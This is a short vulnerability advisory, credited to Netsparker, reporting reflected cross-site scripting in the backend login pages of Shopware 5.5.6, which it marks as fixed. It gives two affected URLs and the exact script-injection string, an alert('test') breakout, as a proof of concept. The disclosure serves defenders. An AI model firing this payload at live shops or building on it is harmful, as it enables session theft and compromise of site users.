Shopware 5.5.6 Cross Site Scripting

Shopware version 5.5.6 suffers from multiple cross site scripting vulnerabilities.


MD5 | 18aa2a2c54c5818505a7790500efa69a

*Information:    *
Advisory by Netsparker
Name: Multiple Cross-site Scripting Vulnerabilities in Shopware
Affected Software: Shopware
Affected Versions: 5.5.6
Homepage: https://en.shopware.com/
Vulnerability: Cross-site Scripting
Severity: High
Status: Fixed
CVSS Score (3.0): AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
Netsparker Advisory Reference: NS-19-004


*Technical Details:*
URL : http://
{DOMAIN}/{PATH-OF-SHOPWARE}/backend/Login?'"--></style></scRipt><scRipt>alert(“test”)</scRipt>
Parameter Type : Query String
Parameter Name : Query Based
Attack Pattern : '"--></style></scRipt><scRipt>alert(“test”)</scRipt>

URL : http://
{DOMAIN}/{PATH-OF-SHOPWARE}/backend/Login/load/?'"--></style></scRipt><scRipt>alert(“test”)</scRipt>
Parameter Type : Query String
Parameter Name : Query Based
Attack Pattern : '"--></style></scRipt><scRipt>alert(“test”)</scRipt>

Regards,

Daniel Bishtawi

Related Posts